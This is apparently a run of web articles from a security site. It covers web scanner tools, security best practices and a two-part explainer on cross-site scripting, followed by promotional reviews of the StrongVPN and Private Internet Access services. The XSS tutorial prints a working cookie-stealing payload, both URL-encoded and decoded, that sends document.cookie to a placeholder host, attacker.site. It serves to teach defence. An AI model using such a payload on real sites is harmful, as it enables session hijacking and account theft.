Once you’ve outlined a plan, it’s time to select your tools. There are a variety of tools available for your consideration and evaluating web application security scanners is not an easy job. Use any tool you are comfortable with. It’s also important to note that experienced penetration testers have learned that it’s best not to rely on one single tool.

Deciding on an automated security scanner often raises the debate between free and open source versus paid commercial platforms. There is no right or wrong answer.

An example of an open source platform for someone who is developing their own application would be a tool such as the OWASP Zed Attack Proxy. It’s relatively easy to use and provides both active and passive scanning, a spider, full reporting and a brute force component that can help to find files with no internal links.

On the other hand, you might also want to consider a commercial web application security scanner. More often than not, they offer a superior user-interface, more consistent updates, as well as better support. On balance, a commercial scanner is often more user-friendly and functional with frequent updates as the developer has a vested interest in offering a high-quality product.

Although open source tools like OWASP ZAP offer a multitude of functionality, best practices dictate that you also use tools dedicated to a specific task. For example, DirBuster and Wfuzz are two tools designed specifically for bruteforcing web applications.

By using a variety of tools, some of which overlap in functionality, you’re more likely to identify and expose a greater number of vulnerabilities.

Implement & Iterate

There is no magic recipe of secret sauce when it comes to automating your web application security scanning. It’s a process that relies heavily on a combination of smart planning, the right tools and necessary experience.

It’s also important to remember that automation is about more than saving time and money. It’s about strategically implementing a process designed to efficiently reduce the vulnerability of your web applications –  letting both software and humans do what they do best.

  • Hits: 14933

Web Application Security Best Practices that Help in Securing Your Web-Enabled App

Web Application Security Best PracticesSuccessful web application attacks and the data breaches that are resulting from these attacks, have now become everyday news, with large corporations being hit constantly.

Our article covering major security breaches in well—known companies, clearly demonstrates that there are many gaps in web security, which are causing multi-million dollar damages to companies world-wide. In this article we analyze the best security practices and principals to help increase your web application security.

While security experts are adamant that there is still much to improve in most web applications’ security, the gaping security holes that attackers are exploiting, are still present, as can be confirmed by some of the latest string of attacks on Yahoo and several departments of the government of the United States.

These attacks, as one can imagine, are the cause of financial loss as well as loss of client trust. If you held an account with a company that suffered a data breach, you would think twice before trusting that company with your data again. Recently, developers have been brought into the fold with regards to web application security; a field that a couple of years ago was only relevant to security professionals whose jobs revolve around security. Nowadays, security has become a requirement that has to be implemented, for a web application developer to meet all the necessary deliverables. Security needs to become a part of the development process, where it is implemented in the code that is being written, and not just as an afterthought that becomes relevant after an attack.

Security has to be a part of every step of the software development life cycle due to its importance. A chain is only as strong as its weakest link, as is a web application - a low level vulnerability can provide an attacker with enough of a foothold that will allow the attacker to escalate the exploit to a higher level. Below are some principles that every web application developer should follow throughout the SDLC, to ensure that they are writing code that is secure enough to withstand any potential attack.

The Defense in Depth Approach

Defense in depth is a concept whereby a system that needs to be secured, will sit behind multiple layers of security. Here, redundancy is key, so that if a security mechanism fails, there will be others that will catch the vulnerability or block its exploitation. It is important that these layers of security are independent from each other and that if one is compromised, the others will not be affected. It would appear that integrating the mechanisms with each other can make for a better security system, such as if one security mechanism detects a vulnerability, it will alert the others so that they can be on the lookout for anything that the first mechanism might have missed. This is not the case, as it will only make for a weaker defense. If the first layer is compromised, it could lead to the other layers being compromised as well, due to their integration which leads us to the fact that having separate and independent mechanisms is the best implementation to go with.

Creating secure Web Applications One such example of implementing a defense in depth approach would be to restrict an administrator panel to be accessed only from a particular IP address. Even though there is enough protection, for most cases, by using credentials in the form of a username and password to log into the admin panel, the added layer of protection will come in handy. If the password is disclosed to an attacker, the protection will no longer be valid, therefore making the login setup irrelevant. By implementing another small but robust security feature, you will be moving towards making your defense infallible.

On the other hand, a security feature should not be a complete inconvenience to the user. For example, allowing access to an admin panel from one IP address makes sense, but requiring the user to pass through too many security checks, will lead the user to take certain shortcuts that will render all the security features that have been set up, futile.

For example, if you request a user to change their password every day, you can be sure that these passwords will be written down on a piece of paper, thus making the environment less secure than what it was to begin with. Which is why there needs to be a balance of making sure that a system is secured, while still allowing users to utilise the system.

Filtering User Input

The key principle is not to trust the end user, since one can never know for sure if the user’s intent is malicious or if the user is simply using your website for its intended purpose. Filtering user input is a good method that will allow your web application to accept untrusted inputs while still being safe to use and store that input.

There are many ways to filter input, depending on the vulnerabilities that are being filtered against. The problem that comes with not filtering user input does not end at the web application itself, since this input will be used subsequently. If the malicious input is not filtered, certain vulnerabilities such as SQL Injection, Cross Site Request Forgery and Cross-site Scripting can be exploited.

Cross-site Scripting (XXS) works since the browser or web application, depending on the type of XSS, will execute any code that it is fed through user input. For example, if a user enters:

<script>alert(‘Exploited Vulnerability’)</script>

And this input is not sanitised, this snippet will be executed. To ensure that this input will not be executed, the data needs to be sanitised by the server.

Filtering user input should always be done on the server side, because once again, the user can never be trusted. If Javascript is used on the client side, there are ways to bypass these checks, but implementing the check on the server ensures that no malicious input will get past the filter.

Principle Of Least Privilege

This principle applies to both applications and users, where the amount of privileges that are provided need to be equivalent to the privileges that are required for them to fulfill their purpose. For example, you would not provide a user who uses their machine for word processing with the authority to install software on that machine.

The same goes for applications - you would not allow an application that provides you with weather updates, with the authority to use your webcam. Apart from the obvious issue where the user (and application) cannot be inherently trusted as they can have malicious intent, the user can also be fooled into performing actions using the allowed authority. For example, the best way to prevent a user from unintentionally installing malware, would be to not allow the user to install anything in the first place.

If a web application will be handing SQL queries and returning the results, the database process should not be running as administrator or superuser, since it brings with it unnecessary risks. If the user input is not being validated and an attacker is able to execute a query of their own, with enough time and the appropriate privileges, the attacker can perform any action that they wish, since they would be running as admin or superuser on the machine hosting the database.

Whitelist, Not Blacklist

This choice will generally depend on what is actually being protected or what access is allowed. If you want the majority of users to access a resource, you will use a blacklist approach, while if you want to allow certain users, a whitelist approach is the way to go. That being said, there is the easier way and the safer way. Whitelisting is considered safer due to the ambiguity of blacklists.

In a blacklist, everything is allowed except those that are not, while in a whitelist, anything that is not listed is not allowed by default. This makes whitelisting more robust when it comes to controlling user input, for example. It is safer to explicitly allow a set of characters that can be inputted by a user, so that any special characters that can be used for an attack, are excluded automatically. By default blacklisting will allow anything, so if the list of exclusions does not include every possible attack parameter and its different variations, there is still a chance of a malicious user input being accepted and passing through the filter.

The amount of variation and obfuscation techniques that have become widespread make the whitelisting approach more desirable. Blocking <script> from user input will not be enough since more advanced techniques are being implemented that are being used to bypass filters that normally search for <script> tags.

For example, if you have a registration form, where a user is prompted to enter their designation, it is much safer to allow all the possible designations (Mr, Mrs, Ms, Dr, Prof., etc.) than having to block all the possible attack parameters that an attacker could use instead of actually inputting their designation.

Finally, the most important principle of all, is that from all the precautions and security measures that are taken, they are still not enough. This is due to two factors, the first being that thinking highly of your web application’s security will leave you complacent and with a false sense of security, where you are sure that your web application is secure from any potential threat. This can never be the case since every day, new advanced threats emerge that could bypass all the security that has been implemented. This leads us to the second point, where successful security techniques are ever evolving even on a daily basis. It is the developer’s responsibility to remain updated with emerging security techniques and threats, since there is always room for improvement when it comes to security.

We left this principle for last; you never know enough. That’s right, we never know enough. Web application security, like any other IT security related subject is evolving on a daily basis. Keep yourself informed by reading and following industry leading web application security blogs.

  • Hits: 10179

Creating a Cross-site Scripting (XSS) Attack. Understanding How XSS Attacks Work & Identifying Web Vulnerabilities

create-cross-site-scripting-xss-attack-understand-how-xss-work-1Part two of our Cross-site scripting (XSS) series shows how easy it is to create & execute a XSS attack, helping readers & network security engineers understand how XSS attacks work and how to identify web application vulnerabilities. Part one explained the concept of XSS attackss while also analyzing the different type of XSS attacks.

XSS exploits can be incredibly simple. The simplest attack grabs the user’s cookie contents and sends it to another server. When this happens, the attacker can extrapolate the user’s session information from what he receives, spoof his cookies to appear as if he is the victimized user, and gain unauthorized access to that user’s account. Obviously, if the user is privileged, like a moderator or administrator, this can have serious ramifications.

As an example, think of an error message page where the message itself is part of the website address (known as a Uniform Resource Identifier, or URI), and is directly presented to the user. For this example, say that web page acts as follows:

Request URI: /error.page?message=404 Error – Content Not Found

1. <html><head><title>Error</title></head><body>

2. An error occurred:<br />

3. 404 Error – Content Not Found

      4. </body></html>

In line 3, you can see the idea behind the page: the error message provided via the query string variable message is printed to the user. If this URI does not sanitize anything, namely such as stripping HTML tags out, an attacker can inject anything.

They can also mask that inject a little by substituting values with URL encoded values. If they wanted to steal cookies off a user using this error page, they could do so as follows:

Request URI: /error.page?message= %3Cscript%3Evar+i%3Dnew+Image%28%29%3Bi.src%3D%22http%3A//attacker.site/cookie%3Fvalue%3D%22+document.cookie%3B%3C/script%3E

1. <html><head><title>Error</title></head><body>

2. An error occurred:<br />

3. <script>var i=new Image();i.src="http://attacker.site/cookie?value="+document.cookie;</script>

      4. </body></html>

First, notice the oddity of the message in the URL. Those two-character values prefixed with a percent sign (%) are hexadecimal numbers representing each character: %3C for <, %3D for =, and so forth. This is a mild form of obfuscation, allowing the browser to understand the string while confusing the user reading it.

In line 3, you can see that the browser properly understood the string and evaluated it into some JavaScript. In this particular example, the attacker has a script on his server that captures user cookie data by tricking the browser into loading that page as an image object. That object passes along the user’s cookie contents for the website to the attacker. That attacker now has the victim’s IP address, cookie data, and more, and can use this information to gain unauthorized access to the victimized user’s account, or worse, to more privileged areas of the website if the victimized user account had elevated rights.

Different Kinds Of XSS Vulnerabilities

create-cross-site-scripting-xss-attack-understand-how-xss-work-2This is also only one example of the various kinds of XSS attacks that can be executed. XSS attacks fall into three general categories as defined by OWASP: Stored, Persistent XSS, Reflected, and DOM-based XSS. Stored XSS attacks, as their name implies, are stored unsanitized in the website (such as in a database entry) and rendered on page-load (this is how the Samy worm operated). Reflected XSS attacks are usually more common, often a result of data within an unsanitized URI string that is rendered by the website’s frontend code (such as in the example above). The final type, DOM-based, exploits the Document Object Model environment similar to a reflected XSS attack, but by altering the page’s elements dynamically.

Identifying XSS Vulnerabilities In Your Web Applications

There is no real catchall that can prevent all XSS exploits due to the highly dynamic nature of their existence and the complexities of new libraries and frameworks like jQuery and Bootstrap. However, a good place to start is with a web application security scanner, which searches for these kinds of exploits and more automatically, and provides suggestions on how to fix the identified XSS vulnerabilities. Sanitization is critical anywhere data is received by a website (like user input, query strings, POST form data, etc.), and a good security scanner can show you where sanitization is missing.

  • Hits: 16418

What is Cross-site Scripting (XSS)? Why XSS is a Threat, how does XSS Work? Different Types of XSS Attacks

understanding-xss-cross-site-scripting-attacks-and-types-of-xss-exploits-1Part one of our two-part series on Cross-site scripting (XSS) explains what are XSS attacks. We also take a close look on how XSS exploits work (urls, cookies, web cache etc.) and analyze their impact on business websiteswebservers, using real examples of popular sites that were hit using different XSS exploits. We also talk about the different type of XSS attacks that make website users very difficult to identify and detect them. Part-two will provide a Cross-site scripting attack example, talk about the different type of XSS vulnerabilities and explain how to identify XSS vulnerabilities in your web applications & web servers.

Part two analyzes XSS attacks, showing how easy it is to create a XSS script, and provides useful information on how to identify XSS vulnerabilities.

Websites operate typically with two sides to them: the backend and frontend. On the backend, there are the familiar layers of systems that generate the elements for the frontend – the web application service, language renderer (e.g. PHP or Python), database, and so forth. These areas are commonly the ones most focused on when it comes to securing a website, and rightfully so. Some of the most damaging hacks in history were a result of successful attacks on the backend systems. But the frontend, where things like HTML, CSS, and most especially JavaScript exist – is equally susceptible to attack, with considerable fallout as well.

Cross-site scripting, which is more commonly known as XSS, focuses the attack against the user of the website more than the website itself. These attacks utilize the user's browser by having their client execute rogue frontend code that has not been validated or sanitized by the website. The attacker leverages the user to complete their attack, with the user often being the intended victim (such as by injecting code to infect their computer). The user loads a trusted website, the rogue script is injected somehow, and when the page is rendered by their browser that rogue script is executed. With more websites performing their actions as browser-rendered code instead of in Flash or with static pages, it is easy to see why XSS can be a significant threat.

Why Is XSS A Threat & How Does It Work?

understanding-xss-cross-site-scripting-attacks-and-types-of-xss-exploits-2An XSS attack can actually be quite dangerous for users of a website, and not just because of the possible trust lost from its customers. When a user accesses a website, often much of its content is hidden behind some form of authentication – like how Facebook is practically useless unless you have an account. That authentication not only hides privileged information, but also provides access to the account itself (social media information, ability to make purchases, etc.). Some of the information required for that authentication is stored on the user's computer, namely in the form of cookies. If a user's cookies can be compromised via an injected XSS exploit, their account can be hijacked as well.

This can have huge ramifications, especially on larger Content Management System (CMS) platforms and even social media websites. The software project management service, JIRA, found itself the target of an XSS exploit that affected large software companies such as the Apache foundation. This caused administrator accounts to become compromised, which could have led to a cascade effect of further data compromise, company secrets, proprietary software, etc. In fact, if you were ever a user of MySpace (remember that website?), you probably heard of the most infamous XSS exploit: the JS.Spacehero worm, also known as the MySpace Samy worm. These attacks not only caused serious problems with account compromises, but considerable financial loss as well. Even though the Samy worm was basically harmless, it caused an exponential spread in less than a day that forced MySpace to take itself offline for several hours, reportedly costing them over $1 million USD in revenue.

Different Types Of XSS Attacks

XSS exploits can take a number of forms, which makes them very difficult for website users to detect. An innocuous short-URL link (like TinyURL or Bitly) to a website, a forum signature image, a modified website address, even something completely hidden from view (e.g. obfuscation, where it is written in an intentionally confusing, illegible manner) – any of these and more can be used to accomplish an XSS exploit. In fact, if a user's browser can load it (such as an image) or execute it (such as code), there exists opportunity for an XSS exploit.

  • Hits: 16509

Best VPN Review: StrongVPN. Download Speed Τest, Torrenting, Netflix, BBC, HULU, DNS Leak Test, Security, VPN Options, Device Support and more

strongvpn top ratedStrongVPN is one of the most popular VPN service around the world. With a presence in over 23 countries,+650 servers, cheap prices, Strong Encryption and blazing fast download speeds – it rightfully deserves the No.1 position in our Best VPN Review.

This in-depth review took weeks to write as we performed extensive testing on workstations and mobile clients, downloading, VPN torrenting, performing security tests, VoIP & Video latency, gaming and more, in an attempt to discover any flaws, issues or limitations the VPN service might have.

Key Topics:

Without any further delay, let’s take a look and see what StrongVPN was able to deliver during these very challenging tests!

Positives:

  • Ranked No.1 in our Best VPN Service review
  • Superfast Download/Upload Speeds supporting Torrents
  • Very low Latency
  • Strong Encryption
  • Zero-Log Policy
  • Effective DNS Leak, IP Leak & WebRTC Protection
  • Cheap for 12 month signup plans 

Concerns:

  • Kill-switch
  • 5 day money-back guarantee period

Visit StrongVPN

Overview 

StrongVPN is one of the oldest in the industry, beginning as a humble PC company in 1994. A subsidiary of Reliable Hosting, the company was created after a move to San Francisco prompted the sale of VPN services.

The US-based company doesn’t promise a whole lot on its website, but under the hood it’s a fast VPN with a no-log policy and great customer service. It supports 5 concurrent connections for $3.8 per month under a yearly package!

While some of the best VPNs focus on a wide range of servers, StrongVPN prioritises speed and the ability to unblock Netflix. It has servers in 45 cities across 23 countries, most of which can bypass region blocks.

Such functionality has made this StrongVPN very popular in China and other countries with aggressive blocking policies. This review will analyze the benefits for a new, global audience.

Ease of Use – StrongVPNGUI Interface

StrongVPN’s install is as simple as it gets. Users are presented with a regular installer and just have to hit next until it’s complete. StrongVPN intelligently installs TAP drivers, requiring no extra prompts. After completion, the application will launch automatically.

At first glance, StrongVPN’s interface is simple. It presents your location, a list of servers, and VPN protocol used to encrypt traffic. Most users will never have to go outside of this interface, leaving a minimal, simple experience.

The StrongVPN client - Probably not the best looking GUI but surely the best service

The StrongVPN client - Probably not the best looking GUI but surely the best service

Once you drill down into settings, things get more complex. Though well-labelled, there’s a lot of information with no tooltips or tutorial. However, these are presented as advanced options so, naturally, they are targeted at power users.

They also provide some information that’s useful to everyone. By default, StrongVPN launches an Information page, which gives account details, launcher version, subscription length, and more. This makes it easier to provide relevant details to support agents, and isn’t something you see often:

StrongVPN client information window

StrongVPN client information window 

It isn’t the best VPN client we’ve seen in terms of ease of use, but the default screen is still simple and the advanced options provide unprecedented customization. Though it was a slightly slow to connect to some servers, that was mitigated by a stable experience afterwards.

VPN Client Platform Availability

The clunkiness of StrongVPN’s client can also be forgiven by its availability. It’s one of the few clients that states supports for all modern versions of Windows, from Windows XP through to Windows 10. Mac support is solid too, with an installer from Yosemite upwards. For Mac users on older systems, there’s a legacy client that works just fine.

Like all of the best VPNs, there’s support for Android and iOS, too. iPhones, iPads and iTouch devices are supported on iOS 9 and up. Android goes back a little further, with support for Ice Cream Sandwich (4.0) and above.

For other platforms, StrongVPN provides some of the most comprehensive guidance we’ve seen. There’s tutorials for Windows Phone, Windows Mobile, Microsoft Surface and more.

StrongVPN Mobile client - Great looking interface with heaps of options

StrongVPN Mobile client - Great looking interface with heaps of options

The mobile apps aren’t the prettiest we’ve seen, but it’s hard to deny the simplicity. StrongVPN has gone for a very barebones interface with a simple button to enable and disable the connection. Though the settings menu isn’t quite where you’d expect it to be, it presents information in a much simpler format than the desktop client.

However, things get a little more complex once you move to Linux. StrongVPN doesn’t provide a dedicated installer for any of the distributions. That’s a very common move, as it’s difficult to provide options for all the different versions, and Linux users tend to be more advanced anyway.

Thankfully, StrongVPN does provide some excellent guidance that makes it much easier. Picture guides are provided for Linux in general and Ubuntu. Some of these take the form of forum posts, while others are detailed picture guides.

Reliable Hosting also gives recommendations to users that are stuck between PPTP, L2TP, and OpenVPN. PTTP is recommended for Ubuntu as it’s the simplest setup and deemed adequate for casual browsing, video streaming, gaming, VoIP/Video calls and other.

Despite this, OpenVPN is quite easy to get working with StrongVPN. The guide for Ubuntu requires minimal command line input and, for other distributions, command line and network manager tutorials are available.

Of course, you can set up OpenVPN on Windows and Reliable Hosting has picture guides for that too. The setup is a little more involved than some, requiring a different username and password than the usual client. Those details are hidden away in a sub-menu, but thankfully the tutorial points you to the right place. 

Connecting to StrongVPN using OpenVPN client

Connecting to StrongVPN using OpenVPN client

With a little effort, we were able to get OpenVPN working with the service just fine. Support was also happy to help with this, and provided valuable advice.

Router VPN Support 

It’s clear that Reliable Hosting has some of the best VPN guidance, and that extends to routers. Though StrongVPN doesn’t have its own OS, it does support a wide range of router firmwares via PPTP and OpenVPN.

In fact, Reliable Hosting has some of the best VPN router guides we’ve seen. The company provides setup tutorials for the popular DD-WRT and TomatoUSB. However, it also goes a step further, with support for the Sabai and Mikrotik Router OS’s.

There are options for less advanced users. StrongVPN sells routers pre-flashed with SabaiOS so that no setup is required. The Tomato-based router OS makes it simple to use VPNs with routers, and requires very little configuration.

Though the routers are shipped by Sabai technology, Reliable Hosting handles the payment. You can also buy a VPN subscription alongside it for less micromanagement.

VPN Privacy, Security and Encyrption

StrongVPN’s multitude of platforms is enhanced by its support for various encryption options. As with most modern clients, StrongVPN uses OpenVPN with either UDP or TCP by default. However, it also supports PPTP, L2TP, and SSTP

Though StrongVPN used to offer different encryption levels depending on your package, that’s no longer the case as all packages now have access to all supported encryption methods. This opens up connections on more niche devices, and provides varying degrees of speed and security. You can find out more about the various protocols in our beginner’s guide to VPNs.

Despite the options, OpenVPN will be the choice of most users. StrongVPN provides up to 256-bit AES encryption via this method, its highest amount. It’s the best VPN encryption in the industry used by law enforcement and privacy experts.

StrongVPN comes with kill switch functionality. The option isn’t immediately obvious, labeled as Allow direct traffic while reconnecting. Unchecking the option will make sure your PC doesn’t transmit any data if the VPN connection drops. However, it’s worth noting that its implementation is questionable, as we have covered below.

To further its anonymous browsing features, Reliable Hosting provides its users with its StrongDNS service for free. This mitigates issues like DNS leaks, which you can read more about here. The user is given the IP address of dedicated DNS servers via a separate client or through manual setup.

DNS Leak Protection Test

It would be unusual to provide a standalone DNS service if it didn’t prevent leaks correctly. However, as a precaution, we ran several tests with StrongDNS. Using the guidance from our DNS leak guide, we first tested with DNSleaktest.com, StrongVPN connected, and StrongDNS disabled.

Testing StrongVPN for DNS Leaks

Testing StrongVPN for DNS Leaks

As with many of the best VPNs, StrongVPNseems to have some built-in protection, changing the DNS address in its TAP driver automatically. The only IP that shows is Reliable Hosting’s Netherlands server. We got the same result using a separate test by CryptoIP, which displayed an identical address:

cyrptoip test 1 strongvpn

Enabling the StrongDNS tool shows similar results. To test correctly, we set StrongVPN TAP drivers to automatically determine DNS servers. Testing without StrongDNS enabled points to a Dyn DNS from Saudi Arabia. While still a reliable hosting DNS, it isn’t as dedicated or safe:

Testing StrongVPN for DNS leaks without StrongDNS enabled

Testing StrongVPN for DNS leaks without StrongDNS enabled

Enabling the StrongDNS tool has the same effect as correctly configured TAP drivers – it forces the computer to use StrongVPN’s dedicated DNS servers

StrongVPN enabled with StrongDNS passed the DNS leak test

StrongVPN enabled with StrongDNS passed the DNS leak test

Despite having the same effect, there are some advantages to using the StrongDNS tool. It protects users regardless of the protocol, and changes automatically when StrongVPN phases in and out of different servers.

Despite this, users should still ensure their system is properly configured against DNS leaks. There are several factors in play, each of which is explained in our DNS leak guide.

Kill Switch Protection Test 

The next feature to test was StrongVPN’s Kill Switch. We found the implementation very difficult to test. StrongVPN’s implementation didn’t kick in when simply disabling TAP drivers like other VPNs.

In fact, disabling TAP drivers cut the VPN connection, displaying our true IP, without any indication from the client. This happened despite having “Allow direct traffic while reconnecting” unticked. That’s slightly concerning, and points to a faulty implementation.

Instead, we tried ending the OpenVPN process in task manager. This cut the VPN connection once more, but this time to client was able to detect it. However, despite a “reconnecting” dialogue, our true IP still leaked.

Confused, we spoke to support about the matter. An agent confirmed to us that the kill switch functionality is not currently working with StrongVPN:

StrongVPN – Asking Live Chat about the Kill Switch feature

StrongVPN – Asking Live Chat about the Kill Switch feature

Naturally, we asked if the feature would be fixed anytime soon. The support agent replied, “sorry, we don't have ETA for that task. it may be fixed in one of the next vpn client releases.”

The feature is not advertised by StrongVPN on the site, so the implementation isn’t particularly misleading. However, it’s definitely something to note. You will have to set up a kill switch manually, which is actually far safer than the implementation of even the best VPNs.

Though it can be tricky on some systems, we have extensive guidance in our VPN for torrenting article.

WebRTC Protection Test

Though StrongVPN doesn’t protect against connection loss, its WebRTC prevention is very good. For those unfamiliar, WebRTC is a communications protocol. It allows for real-time file and video sharing in the browser without the need for extra plugins. Unfortunately, it also lets websites use javascript to discover a user’s true IP address, even if they’re using a VPN.

Using the StrongDNS tool and ipleak.net, we found no issues withWebRTC. Though it was enabled in our browser, only a Shared Address Space IP was revealed:

StrongVPN protects against WebRTC leaks

StrongVPN protects against WebRTC leaks

Only the best VPNs can provide such functionality and, in this case, it’s thanks to StrongVPN’s dedicated DNS servers. Even with StrongDNS disabled, the service maintained anonymous browsing.

Speed Test and Reliability

Other than anonymity, speed is an important factor in VPN purchases. Encryption always means a slowdown of some sort, but the amount can vary depending on provider. We run tests on all of the best VPN providers to determine the fall off from different locations.

Using the popular Speedtest.net, we first ran a test from a 100 Mbps UK connection without the VPN enabled on the San Jose server. It came back at a solid 89.84 Mb/s.

Speedtest without a VPN

Speedtest without a VPN 

This initial test confirmed we had the ability to utilise almost 100% of our link to the internet.

Next, we enabled our StrongVPN and tried the same test again and the results were staggering:

StrongVPN truly impressed us with its superfast download speeds and low latency

StrongVPN truly impressed us with its superfast download speeds and low latency

We experienced an expectedsmall drop off using the San Jose server, down to 82.48 Mb/s which is really negligible considering our connection had additional overhead due to the heavy encryption and we also introduced an additional hop (VPN server) between our location and the San Jose Speedtest.net server.

The round-trip ping came in only 156ms – that’s only a 16ms increase in latency which is very impressive!

That’s a very fast VPN, with fast downloads/uploads and very low latency while gaming. The download and upload speeds are up there with the best VPNs and certainly fast enough to support any scenario.

StrongVPN Unblocks Netflix, BBC iPlayer, HULU and Region Blocks

The service was able to unblock Netflix successfully. It seems to work with every U.S. server except Miami and Atlanta. Here’s an example from a New York Server:

US Netflix successfully unblocked with StrongVPN

US Netflix successfully unblocked with StrongVPN 

While most of the best VPN providers can unblock Netflix, StrongVPN is particularly impressive. Not only does it work for almost all US servers, it’s also able to unblock Netflix around the globe. In our short testing we were able to access Netflix from the following countries:

  • US
  • UK
  • Australia
  • Canada
  • China
  • Czech Republic
  • Germany
  • Israel
  • Japan
  • Italy
  • Korea
  • Latvia
  • Luxembourg
  • Malaysia
  • Mexico
  • Netherlands
  • Norway
  • Romania
  • Singapore
  • Sweden
  • Switzerland
  • Turkey 

The only notable ones missing were Spain and France. This is the best VPN functionality we’ve seen from any VPN provider we’ve tested. Combined with fast VPN speeds, streaming is quick and available from almost anywhere on the planet.

StrongVPN advises users to report services that are blocked by sending a tracert report. If there’s a genuine problem, they’re usually good at fixing it. 

StrongVPN unblocks BBC iPlayer

StrongVPN unblocks BBC iPlayer 

The unblock Netflix functionality extends to other services. Using a fast VPN connection from the UK, we were able to access BBC iPlayer without any issues. Though it currently only supports less secure protocols, StrongVPN is clearly the top in its class at bypassing region blocks. Much of this is down to its StrongDNS tool, which helps to convince websites the connection is genuine.

StrongVPN for Torrenting 

VPNs are popular for torrenting and peer-to-peer downloads and StrongVPN certainly did not disappoint. Using a legal download of Ubuntu, we first tested without the VPN enabled from the UK:

torrent download without strongvpn

Torrent downloading without VPN enabled

Torrent download speeds were not the greatest despite our fast connection but there are many factors at play here, including variation in healthy peers and ISP bandwidth caps.

We then enabled our StrongVPN connection and re-tested the same download noticing a significant increase in download speed:

torrent download with strongvpn enabled

Torrent downloading speed increased with StrongVPN enabled

This test also confirms the results we saw during the writing of our VPN for Torrenting article where our download speeds increased from 1.2Mb/sec to 3.1Mb/sec after enabling our StrongVPN client.

As a general rule of thumb users downloading via torrent should be using a VPN to help ensure their download speeds are not capped by their ISP. While no ISP will admit they are in fact throttling connections, when using a VPN we can clearly see the difference.

StrongVPN's no-log policy also helps ensure user data is not tracked or logged.

VoIP & Video Calls

VoIP and Video calls are one of the toughest tests when it comes to VPNs mainly because VoIP is very sensitive to latency (delay). Generally any one-way delay greater than 150ms (0.15 seconds) will be evident to everyone that’s participating in the call.

We wanted to test StrongVPN under the most extreme conditions so we decided to perform VoIP and video calls from Australia to Australia via a StrongVPN server located in the United States.

strongvpn voip video calls latency test

We connected our mobile VPN client with a StrongVPN server in Washington DC and then launched three different VoIP/Video applications: Viber, Skype and Zoiper. We made VoIP and video calls to users located in Australia forcing packets to travel to the USA and then back to Australia as shown in the diagram above.

The results were surprisingly great as there were very few times we had delays which were barely noticeable. Video and audio worked great without any issues and our Viber application continuously reported Excellent Network Quality even during video calls:

VoIP and Video calls work great with StrongVPN

VoIP and Video calls work great with StrongVPN

Does StrongVPN Keep Logs?  

Though StrongVPN has some considerable security features, it can still be compromised if the service keeps logs. When browsing, a user hides behind a VPN’s server IPs. However, logs allow a government agency or copyright holder to discover the user’s true identity via a legal request. This is particularly important for StrongVPN, as it’s based in the US. The US has many surveillance programs and is part of the five-eyes intelligence alliance.

Thankfully, StrongVPN does not keep VPN connection logs of any kind. Its privacy policy reads as follows:

“StrongVPN does not collect or log any traffic or use of its Virtual Private Network service.

We will only comply with all valid subpoena request that follow the letter of the law. We cannot provide information that we do not have. StrongVPN will not participate with any request that is unconstitutional.”

This is a relatively recent change. In the past, StrongVPN was known for keeping logs, both for fourteen days and indefinitely. It’s great to see the service adapting to modern requirements and providing its users with more privacy as a result. Bear in mind the service has been around for 20 years, before the extent of mass surveillance was known. This gives a little leeway to its old policies.

However, even the best VPNs tend to keep logs on their website. StrongVPN is no different in this regard. Reliable Hosting collects cookies, Google analytics, and other such services. This is used to improve the service and isn’t sold to third parties.

Account information is stored too. This includes your billing address, name, email address and more. The logging policy differs depending on the payment method you use, however. StrongVPN does support Bitcoin, which provides significantly more anonymity. You can also use a fake name and email address to circumvent some of these worries.

Support – Response Time and Quality 

StrongVPN says its support is second to none and, in our usage, that was the case. The 24/7 live chat has a strict hierarchy and dedicated tech support, something we haven’t seen with any other service. This was refreshing, as support agents had in-depth knowledge about what they were discussing and how to provide help.

Response times were very quick, and we managed to get in contact with a human within a few minutes, even at peak times. We presented a number of issues, including connection errors and OpenVPN setup. Tech support solved both quickly, and provided more details about the service. They were clearly typing information personally, rather than copying and pasting answers.

StrongVPN also has email support for non-urgent cases. The response is much the same, with detailed, personalized answers in a short time frame. It never took more than a couple of hours to get a reply, which is definitely acceptable when there’s 24/7 support via livechat.

All in all, StrongVPN’s support is exceptional. Naturally, it depends on the support agent but we were impressed with their admittance of broken features, where others would try to skirt around the issue. Though the service might be considered expensive by some, it does come with some of the best VPN support around. 

Value for Money 

On the topic of price, StrongVPN’s value really depends on what you’re using it for. The $3.80 subscription fee is very cheap, and not at all extortionate.

Those who want to bypass region blocks or be safe on public WiFi will be much more suited to this service. It’s the best VPN we’ve seen to unblock Netflix, and is a fast VPN aswell. Its offering of 23 countries is more than enough, and platform availability is also a strong point.

Summary 

StrongVPN has changed a lot in recent years, and it’s worth keeping an open mind.  Its fast download speeds, simple but effective VPN client, strong encryption, zero-log policy, awesome ability to unblock Netflix, LuLu and BBC iPlayer makes it a clear winner. And if you aren’t happy with the service, StrongVPN still has a five-day money back guarantee.

Visit StrongVPN

  • Hits: 23583

Best VPN Review: Private Internet Access (PIA) Features, Pricing, User Experience, Benchmarking & Torrenting

Private Internet Access PIA VPN ReviewThe market for Virtual Private Networks has exploded over the past few years. A wealth of new providers has appeared, promising logless browsing, true anonymity, and fast speeds. Through all that noise, it’s becoming increasingly difficult to find the Best VPN for your needs.

Thankfully, there are some established brands that stand above the rest. One of these is Private Internet Access (PIA), launched by London Trust Media in 2010. PIA is very popular for P2P downloads, allowing torrents on every server via secondary VPNs.

In addition, PIA keeps no logs and eliminates DNS leaks, IPv6 leaks, web tracking and malware. It boasts over 3200 servers across 24 countries, as well as a free SOCKS5 proxy.

PIA’s VPN Gateways provide thousands of servers across the globe

PIA’s VPN Gateways provide thousands of servers across the globe

It’s a fast VPN and quite wide-reaching. All of this comes at a price of only $3.33 (US) a month, though there are a few caveats.

PIA VPN represents an amazing value for money

At only $3.33/month US, PIA represents an amazing value for money

Primarily, there is a slightly limited ability to bypass region blocks. PIA might require logging into a few VPN servers to find one that successfully unblocks Netflix or Hulu, but does work without a problem with BBC and other geo-restricted content. Additionally, its popularity means users are more likely to be incorrectly blacklisted from sites.

While the desktop VPN client seems fairly simple, the iOS and Android clients are have a more pleasing look and interface. Despite the simplified desktop interface PIA still remains one of the Best VPNs around offering great value for money.

Quick overview of VPN features offered by Private Internet Access

Quick overview of VPN features offered by Private Internet Access

PIA VPN Client Installation

